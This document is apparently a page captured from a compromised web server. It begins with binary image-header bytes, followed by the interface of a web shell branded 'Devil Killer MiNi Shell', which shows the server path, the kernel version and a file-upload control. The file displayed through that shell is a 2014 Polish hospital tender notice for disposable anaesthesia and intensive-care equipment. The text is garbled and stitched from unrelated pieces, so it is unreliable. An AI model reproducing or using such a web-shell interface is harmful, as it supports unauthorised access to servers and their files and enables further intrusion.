JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140401/69805-N-2014.html

<p class="kh_header"><b>Koszalin: Sprzęt medyczny jednorazowego użytku stosowany w Oddziałach Anestezjologii i Intensywnej Terapii</b><br>
<b>Numer ogłoszenia: 69805 - 2014; data zamieszczenia: 01.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. Mikołaja Kopernika , ul. T. Chałubińskiego 7, 75-581 Koszalin, woj. zachodniopomorskie, tel. (094) 3488103, faks (094) 3488103.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swk.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzęt medyczny jednorazowego użytku stosowany w Oddziałach Anestezjologii i Intensywnej Terapii.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zadanie nr 1 - Igły do znieczulenia podpajęczego - 4550 szt.;
2.	Zadanie nr 2 - Igły do blokad splotów nerwowych - 550 szt.;
3.	Zadanie nr 3 - Rurki intubacyjne - 7700 szt.;
4.	Zadanie nr 4 - Rurki intubacyjne do długich intubacji - 60 szt.;
5.	Zadanie nr 5 - Rurki intubacyjne do długich wentylacji w Oddziale Anestezjologii i Intensywnej Terapii Dorosłych - 150 szt.;
6.	Zadanie nr 6 - Rurki intubacyjne wstępnie uformowane - 130 szt.;
7.	Zadanie nr 7 - Rurki tracheostomijne - 360 szt.;
8.	Zadanie nr 8 - Rurki ustno gardłowe - 10000 szt.;
9.	Zadanie nr 9 - Uchwyt do mocowania rurek intubacyjnych - 1500 szt.;
10.	Zadanie nr 10 - Maseczki - 1250 szt.;
11.	Zadanie nr 11 - Zestawy do drenażu klatki piersiowej - 160 szt.;
12.	Zadanie nr 12 - Worki do godzinowej zbiórki moczu - 180 szt.;
13.	Zadanie nr 13 - Sterylne filtry elektrostatyczne i mechaniczne dla dorosłych - 10500 szt.;
14.	Zadanie nr 14 - Sterylne filtry elektrostatyczne pediatryczne - 1100 szt.;
15.	Zadanie nr 15 - Sterylne filtry elektrostatyczne noworodkowe - 1400 szt.;
16.	Zadanie nr 16 - Wymiennik ciepła i wilgoci do rurek tracheostomijnych i intubacyjnych - 900 szt.;
17.	Zadanie nr 17 - Przepływowy nawilżacz tlenu jednorazowego użytku - 700 szt.;
18.	Zadanie nr 18 - Aparaty do pompy Braun - 2300 szt.;
19.	Zadanie nr 19 - Regulator prędkości przepływu - 3000 szt.;
20.	Zadanie nr 20 - Kocyk dla dorosłych do aparatu Equator - 120 szt.;
21.	Zadanie nr 21 - Linie do podgrzewacza Hotline - 500 szt.;
22.	Zadanie nr 22 - Zestawy do kaniulacji dużych naczyń - 1200 szt.;
23.	Zadanie nr 23 - Zestawy do kaniulacji żył centralnych - 150 szt.;
24.	Zadanie nr 24 - Zestawy do przezskórnego drenażu, rampy - 3555 szt.;
25.	Zadanie nr 25 - Zestawy do znieczuleń zewnątrzoponowych ciągłych oraz łączonych zewnątrzoponowych-podpajęczych (CSE) - 530 szt.;
26.	Zadanie nr 26 - Zestawy do pomiaru ciśnienia - 800 szt.;
27.	Zadanie nr 27 - Obwody do respiratora - 100 szt.;
28.	Zadanie nr 28 - Obwody do aparatu do znieczulenia - 600 kpl.;
29.	Zadanie nr 29 - Obwody do respiratora w Oddziale Anestezjologii i Intensywnej Terapii Dorosłych - 1000 kpl.;
30.	Zadanie nr 30 - Elektrody do czasowej stymulacji serca - 125 szt.;
31.	Zadanie nr 31 - Przyrządy do żywienia dojelitowego - 4320 szt.;
32.	Zadanie nr 32 - Kraniki trójdrożne - 9400 szt.;
33.	Zadanie nr 33 - Przedłużacze anestezjologiczne - 5400 szt.;
34.	Zadanie nr 34 - Dreny do pompy objętościowej GRASEBY 3000 - 860 szt.;
35.	Zadanie nr 35 - Przedłużacze do pomp strzykawkowych - 30200 szt.;
36.	Zadanie nr 36 - Cewniki do odsysania, zgłębniki - 135320 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 36.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	oświadczenie dotyczące danych wykonawcy - Załącznik nr 1 do SIWZ;
2)	opis przedmiotu zamówienia - Załącznik nr 2 do SIWZ;
3)	formularz ofertowy - Załącznik nr 4 do SIWZ;
4)	próbki dostawy zgodne ze złożoną ofertą w celu porównania ze szczegółowym opisem przedmiotu zamówienia:
Zadanie nr: 1 - 1 sztuka z każdej pozycji;
Zadanie nr: 2 - 1 sztuka z każdej pozycji;
Zadanie nr: 3 - 1 sztuka z pozycji 2 i 3, 2 sztuki z pozycji 1, tj.: 1 sztuka w rozmiarze od 3.5 do 4.5 i 1 sztuka w rozmiarze 5.0 do 9.5;
Zadanie nr: 4 - 1 sztuka;
Zadanie nr: 5 - 1 sztuka;
Zadanie nr: 6 - 1 sztuka z każdej pozycji;
Zadanie nr: 7 - 1 sztuka z każdej pozycji;
Zadanie nr: 8 - 1 sztuka;
Zadanie nr: 9 - 1 sztuka;
Zadanie nr: 10 - 1 sztuka z każdej pozycji;
Zadanie nr: 11 - katalog;
Zadanie nr: 12 - katalog;
Zadanie nr: 13 - 1 sztuka z każdej pozycji;
Zadanie nr: 14 - 1 sztuka z każdej pozycji;
Zadanie nr: 15 - 1 sztuka z każdej pozycji;
Zadanie nr: 16 - 1 sztuka;
Zadanie nr: 17 - katalog;
Zadanie nr: 18 - katalog;
Zadanie nr: 19 - 2 sztuki;
Zadanie nr: 20 - katalog;
Zadanie nr: 21 - katalog;
Zadanie nr: 22 - katalog;
Zadanie nr: 23 - katalog
Zadanie nr: 24 - katalog; 
Zadanie nr: 25 - katalog; 
Zadanie nr: 26 - katalog;
Zadanie nr: 27 - katalog; 
Zadanie nr: 28 - 1 sztuka;
Zadanie nr: 29 - 1 sztuka;
Zadanie nr: 30 - katalog;
Zadanie nr: 31 - katalog;
Zadanie nr: 32 - 1 sztuka z każdej pozycji: 
Zadanie nr: 33 - 1 sztuka z każdej pozycji;
Zadanie nr: 34 - katalog;
Zadanie nr: 35 - 1 sztuka - rozmiar dowolny;
Zadanie nr: 36 - 1 sztuka z pozycji 1-4, 1 sztuka z pozycji 5, 1 sztuka z pozycji 6, 1 sztuka z pozycji 7-14.
Wykonawcy zobowiązani są opisać próbki numerem zadania i rodzajem asortymentu oraz opisać strony z katalogów z zaznaczeniem oferowanych zadań i pozycji. Ilości próbek odnoszą się do formularza ofertowego.
5)	oświadczenie Wykonawcy o klasie wyrobu medycznego (klasa I, II a, II b, lub III);
6)	deklaracja zgodności;
7)	potwierdzenie jednostki notyfikowanej - nie dotyczy wyrobów medycznych należących do klasy I niesterylnej;
Wykonawcy zobowiązani są opisać dokumenty (pkt.6 i 7) numerem zadania i pozycji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Dopuszcza się możliwość wydłużenia okresu realizacji umowy, w przypadku niezrealizowania przedmiotu umowy w umownym terminie z powodu zmniejszenia potrzeb własnych.
2.	Dopuszcza się możliwość zmiany przedmiotu zamówienia wynikającego z oferty na podstawie, której zawarta została umowa, przy niższej lub niezwiększonej cenie, w przypadku, gdy:
1)	Wykonawca zaproponuje nowszy technologicznie produkt spełniający parametry określone w opisie przedmiotu zamówienia;
2)	Wykonawca wstrzyma wprowadzanie przedmiotu umowy do obrotu handlowego i zaproponuje produkt równoważny, spełniający parametry określone w opisie przedmiotu zamówienia;
3)	wystąpi incydent medyczny związany z przedmiotem umowy i Wykonawca zaproponuje produkt równoważny, spełniający parametry określone w opisie przedmiotu zamówienia;
4)	producent przedmiotu umowy wstrzyma produkcję i Wykonawca zaproponuje produkt równoważny, spełniający parametry określone w opisie przedmiotu zamówienia;
5)	producent zmieni sposób konfekcjonowania przedmiotu umowy.
3.	Dopuszcza się możliwość zmiany numeru katalogowego, kodu produktu i nazwy własnej przedmiotu umowy, w przypadku, gdy wykonawca zaproponuje taką zmianę.
4.	Dopuszcza się możliwość obniżenia wielkości ceny, w przypadku, gdy Wykonawca w okresie realizacji umowy zaproponuje ten sam produkt w niższej cenie.
5.	Dopuszcza się możliwość zmiany stawki podatku VAT na towary sprzedawane w ramach rozstrzygniętego postępowania. Zmiana ceny następuje nie wcześniej niż z dniem wejścia w życie aktu prawnego zmieniającego stawkę podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swk.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITAL WOJEWÓDZKI IM. MIKOŁAJA KOPERNIKA
UL. T. CHAŁUBIŃSKIEGO 7, 75-581 KOSZALIN
DZIAŁ ZAMÓWIEŃ PUBLICZNYCH.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 10:00, miejsce: SZPITAL WOJEWÓDZKI IM. MIKOŁAJA KOPERNIKA
UL. T. CHAŁUBIŃSKIEGO 7, 75-581 KOSZALIN
DZIAŁ ZAMÓWIEŃ PUBLICZNYCH.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> IGŁY DO ZNIECZULENIA PODPAJĘCZEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Igły do znieczulenia podpajęczego pencil - point, rozm. 25G x 90mm, 26G x 90mm, 27G x 90mm - 4500 szt.;					
2) Igły do znieczulenia podpajęczego, rozm. 27G x 120-130mm - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> IGŁY DO BLOKAD SPLOTÓW NERWOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Igły do blokad splotów nerwowych pod kontrolą USG, rozm. 22G/50mm - 300 szt.;
2) Igły do blokad splotów nerwowych pod kontrolą USG, rozm. 22G/80mm - 100 szt.;
3) Igły do blokad splotów nerwowych przy użyciu stymulatora, rozm. 22G/50mm - 100 szt.;
4) Igły do blokad TAP widoczna pod USG, rozm. 21G/110mm - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> RURKI INTUBACYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Rurki intubacyjne z mankietem niskociśnieniowym, rozm. od nr 3.5 do nr 9,5 co 0,5 - 6500 szt.;				
2) Rurki intubacyjne bez mankietu, rozm. od nr 4.0 do nr 6.5 co 0.5 - 1000 szt.;
3) Rurki intubacyjne zbrojone z mankietem niskociśnieniowym, rozm. 6.0, 7,0, 8,0, 9,0 - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RURKI INTUBACYJNE DO DŁUGICH INTUBACJI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurki intubacyjne do długich intubacji, rozm. 7.0, 7.5, 8.0, 8.5, 9.0 - 60 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RURKI INTUBACYJNE DO DŁUGICH WENTYLACJI W ODDZIALE ANESTEZJOLOGII I INTENSYWNEJ TERAPII DOROSŁYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurki intubacyjne do długich wentylacji w Oddziale Anestezjologii i Intensywnej Terapii Dorosłych, rozm. 7.0, 7.5, 8.0, 8.5, 9.0 - 150 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RURKI INTUBACYJNE WSTĘPNIE UFORMOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Rurka intubacyjna wersja północ, rozm. 6.0, 6.5, 7.0, 7.5, 8.0 - 100 szt.;
2) Rurka intubacyjna wersja południe, rozm. 6.0, 6.5, 7.0, 7.5, 8.0 - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> RURKI TRACHEOSTOMIJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Rurki standardowe z ruchomym szyldem bez mankietu, rozm. 3.0, 3.5, 4.0, 4.5 - 120 szt.;
2) Rurki z regulowanym położeniem kołnierza, rozm. 5.0, 6.0, 7.0, 8.0 - 10 szt.;
3) Rurki standardowe z mankietem niskociśnieniowym, rozm. 7.0, 7.5, 8.0 - 30 szt.;
4) Rurka z odsysaniem z przestrzeni podgłośniowej, rozm. 7.0, 7.5, 8.0, 8.5, 9.0 - 200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> RURKI USTNO-GARDŁOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rurki ustno-gardłowe, rozm. 0,1,2,3,4,5 - 10000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> UCHWYT DO MOCOWANIA RUREK INTUBACYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uchwyt do mocowania rurek intubacyjnych - 1500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> MASECZKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Maseczka krtaniowa, rozm. 4 i 5 - 250 szt.;
2) Maseczka tlenowa dla dorosłych - 500 szt.;
3) Maseczka tlenowa dla dzieci - 500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> ZESTAWY DO DRENAŻU KLATKI PIERSIOWEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zestaw do drenażu klatki piersiowej - 10 szt.;
2) Zestawy drenów do drenażu jednobutlowego - 100 szt.;
3) Zestaw drenów do drenażu dwubutlowego - 50 szt..</p></li>
